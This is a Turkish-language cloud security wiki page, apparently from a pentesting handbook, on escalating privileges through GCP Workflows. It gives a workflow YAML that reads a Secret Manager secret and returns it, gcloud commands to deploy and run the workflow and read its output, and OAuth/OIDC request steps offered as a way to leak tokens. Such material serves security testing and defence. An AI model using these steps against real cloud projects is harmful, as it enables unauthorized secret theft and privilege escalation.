GCP - Workflows Privesc

Workflows

Temel Bilgiler:

workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)

Bildigim kadarıyla, bir Workflow'a bağlı SA'nın kimlik bilgilerini içeren metadata uç noktasına erişim ile bir shell almak mümkün değil. Ancak, Workflow içinde gerçekleştirilmesi gereken eylemleri ekleyerek SA'nın izinlerini kötüye kullanmak mümkündür.

Bağlayıcıların belgelerini bulmak mümkündür. Örneğin, bu Secretmanager bağlayıcısının sayfası'dır. Yan menüde birkaç diğer bağlayıcıyı bulmak mümkündür.

Ve burada bir sırrı yazdıran bir bağlayıcının örneğini bulabilirsiniz:

main:
params: [input]
steps:
- access_string_secret:
call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
args:
secret_id: secret_name
version: 1
project_id: project-id
result: str_secret
- returnOutput:
return: '${str_secret}'

CLI'dan güncelleme:

gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
--source=/path/to/config.yaml \
--location us-central1

Eğer ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist gibi bir hata alırsanız, sadece bir dakika bekleyin ve tekrar deneyin.

Web erişiminiz yoksa, bir Workflow'un tetiklenmesini ve yürütülmesini görmek mümkündür:

# Run execution with output
gcloud workflows run <workflow-name> --location us-central1

# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1

# List executions
gcloud workflows executions list <workflow-name>

# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>

İzin verilmediği için PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... gibi bir hata alsanız bile, iş akışı oluşturulmuştur.

OIDC token'ı sızdırma (ve OAuth?)

belgelere göre OAuth veya OIDC token'ı ile HTTP isteği gönderecek iş akışı adımlarını kullanmak mümkündür. Ancak, Cloud Scheduler durumunda olduğu gibi, Oauth token ile HTTP isteği .googleapis.com ana bilgisayarına yapılmalıdır.

Oauth

- step_A:
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPE

OIDC

- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCE

workflows.workflows.update ...

Bu izin ile workflows.workflows.create yerine, zaten mevcut bir iş akışını güncellemek ve aynı saldırıları gerçekleştirmek mümkündür.